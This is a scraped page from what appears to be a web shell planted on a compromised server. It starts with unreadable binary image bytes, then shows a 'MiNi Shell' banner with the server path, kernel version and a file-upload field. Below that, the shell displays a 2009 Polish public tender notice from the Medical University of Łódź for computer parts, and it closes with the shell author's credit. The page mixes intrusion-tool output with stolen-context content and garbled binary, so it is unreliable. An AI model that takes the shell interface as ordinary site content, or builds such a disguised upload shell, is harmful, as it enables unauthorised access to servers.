JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/159962-N-2009.html

<p class="kh_header"><b>Łódź: DOSTAWA CZĘŚCI ZAMIENNYCH I WYPOSAŻENIA DO KOMPUTERÓW 
DLA UNIWERSYTETU MEDYCZNEGO W ŁODZI</b><br>
<b>Numer ogłoszenia: 159962 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny , al. Kościuszki 4, 90-419 Łódź, woj. łódzkie, tel. 042 6302330, faks 042 6393952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umed.lodz.pl/zp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA CZĘŚCI ZAMIENNYCH I WYPOSAŻENIA DO KOMPUTERÓW 
DLA UNIWERSYTETU MEDYCZNEGO W ŁODZI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 (plik do pobrania na stronie http://www.umed.lodz.pl/zp). Przedmiot zamówienia stanowi tzw. koszyk przykładowych materiałów i będzie on służył do celów porównawczych przy wyborze Wykonawcy. Koszyk wskazanych materiałów musi być wyliczony w oparciu o ceny jednostkowe, którymi posługiwał się Wykonawca na dzień 20.05.2009 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9, 30.23.71.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości równej: 3 500,00 zł
słownie: trzy tysiące pięćset 00/100 zł
2.	Ostateczny termin wniesienia wadium i doręczenia dowodu jego wniesienia upływa dnia: 29.05.2009 r. do godz. 10.00
3.	Wadium może być wniesione w następujących formach: 
-	pieniądzu   przelewem na konto ING BANK ŚLĄSKI W ŁODZI 21 10501461 1000 0022 8237 8799 do dnia 29.05,2009 r. do godz. 10.00 z zaznaczeniem Wadium   ZP/14/2009 -części komputerowe. Dokument musi być zgodny z wytycznymi z rozdziału XIII ust. 2 SIWZ.
-	w poręczeniach bankowych (w postaci oryginału dokumentu) lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
-	gwarancjach bankowych (w postaci oryginału dokumentu),
-	gwarancjach ubezpieczeniowych (w postaci oryginału dokumentu).
4.	Zamawiający dokona niezwłocznie zwrotu wadium z chwilą, gdy:
-	upłynął termin związania z ofertą
-	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
-	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
-	który wycofał ofertę przed upływem terminu składania oferty,
-	który został wykluczony z postępowania,
-	którego oferta została odrzucona.
6.	Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie § 46 ust. 2 pkt. 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
7.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:
1.	Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych.
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
-	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
2.	Wykonawców, którzy wskażą w ofercie części zamówienia, których wykonanie zamierzają powierzyć Podwykonawcom,
3.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty.
  
4.	Zamawiający odrzuca ofertę Wykonawcy:
-	gdy jest ona niezgodna z ustawą,
-	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3,
-	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
-	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
-	wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
-	zawiera błędy w obliczeniu ceny,
-	który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt. 3,
-	nieważnej na podstawie odrębnych przepisów.

5.	Warunki dodatkowe:
-	Nieprzekraczalny czas dostawy od momentu złożenia zamówienia - maksymalnie 24 godziny.
-	Miejsce dostawy - Zamawiający wymaga dostarczenia przedmiotu zamówienia do bezpośrednich odbiorców, tj. ok. 350 jednostek organizacyjnych UM usytuowanych w Łodzi. Zamówienie będzie realizowane sukcesywnie wg potrzeb Zamawiającego w ilościach każdorazowo przez niego wskazanych. Zamówienia będą składane przez Zamawiającego drogą telefoniczną lub faksem.
-	Nie wcześniej niż po 6 miesiącach licząc od dnia podpisania umowy, Zamawiający zastrzega sobie możliwość zmiany cen jednostkowych poszczególnych części asortymentowych przedmiotu zamówienia, jeżeli ulegną one obniżeniu, wg katalogów oferowanych Wykonawców. Podstawę prawną powyższej czynności stanowić będzie art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. nr 223, poz. 1655 z późn. zmian.), który stanowi:
Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, chyba, że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
-	W przypadku zakupu części komputerowych nieuwzględnionych w koszyku materiałów obowiązywać będą aktualne, tj. na dzień złożenia zamówienia ceny katalogowe Wykonawcy z uwzględnieniem rabatu obowiązującego dla części komputerowych z koszyka materiałów.
-	Zamawiający zastrzega niezmienność rabatu przez cały okres trwania umowy.
-	Termin płatności: 30 dni od daty otrzymania faktury po zrealizowaniu przekazanych do realizacji zamówień.
-	Zamawiający wymaga dołączenia do oferty obowiązującego na dzień 20.05.2009 r. katalogu produktów wskazanych w koszyku wraz z aktualnymi cenami, w wersji drukowanej bądź elektronicznej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz Oferty wg załącznika nr 1.
2.	Wypełniony Przedmiot zamówienia wg załącznika nr 2.
3.	Oświadczenie Wykonawcy, o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne - art. 22 ust. 1 pkt. 1-4 prawa zamówień publicznych   załącznik nr 3.1
4.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 1-10 oraz ust. 2 pkt. 1-4 prawa zamówień publicznych - załączniki nr 3.2
5.	Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1:
5.1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.2.	W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie dla wspólnego pełnomocnika.
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5.1. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, odpowiednio, że: 
6.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
7.	Dokumenty, o których mowa w pkt 6.1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
9.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie musi być w formie oryginału lub notarialnie poświadczonej kopii.
10.	Zamawiający żąda wskazania przez Wykonawcę w ofercie części Zamówienia, której wykonanie powierzy podwykonawcom. Zamawiający bezwzględnie żąda spełnienia - pod rygorem odrzucenia oferty - tego wymogu poprzez wypełnienie punktu nr 11 w formularzu oferty.
11.	Oświadczenie Wykonawcy, że oferowany sprzęt posiada deklarację zgodności CE oraz instrukcję użytkowania zgodnie z Rozporządzeniem Ministra Gospodarki z dn. 21.12.2005 r. (Dz.  U. 2005  Nr 259, poz. 2173) - załącznik nr 5 SIWZ.
12.	Katalog produktów, wskazanych w koszyku, obowiązujący na dzień 20.05.2009 r., wraz z aktualnymi cenami w formie drukowanej lub elektronicznej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umed.lodz.pl/zp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Medyczny w Łodzi, Al. Kościuszki 4 - III piętro, pok. 22, Biuro Obsługi i Realizacji Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Uniwersytet Medyczny w Łodzi, Al. Kościuszki 4 - III piętro, pok. 22, Biuro Obsługi i Realizacji Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - części zamiennych oraz oprogramowania do komputerów..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2  - Pakiet nr 1 części zamienne oraz oprogramowanie do komputerów (plik do pobrania na stronie http://www.umed.lodz.pl/zp). Przedmiot zamówienia stanowi tzw. koszyk przykładowych materiałów i będzie on służył do celów porównawczych przy wyborze Wykonawcy. Koszyk wskazanych materiałów musi być wyliczony w oparciu o ceny jednostkowe, którymi posługiwał się Wykonawca na dzień 20.05.2009 r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.00-0, 30.23.70.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - elementów sieci LAN..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 - Pakiet nr 2 - elementy LAN (plik do pobrania na stronie http://www.umed.lodz.pl/zp). Przedmiot zamówienia stanowi tzw. koszyk przykładowych materiałów i będzie on służył do celów porównawczych przy wyborze Wykonawcy. Koszyk wskazanych materiałów musi być wyliczony w oparciu o ceny jednostkowe, którymi posługiwał się Wykonawca na dzień 20.05.2009 r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.00-0, 30.23.70.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com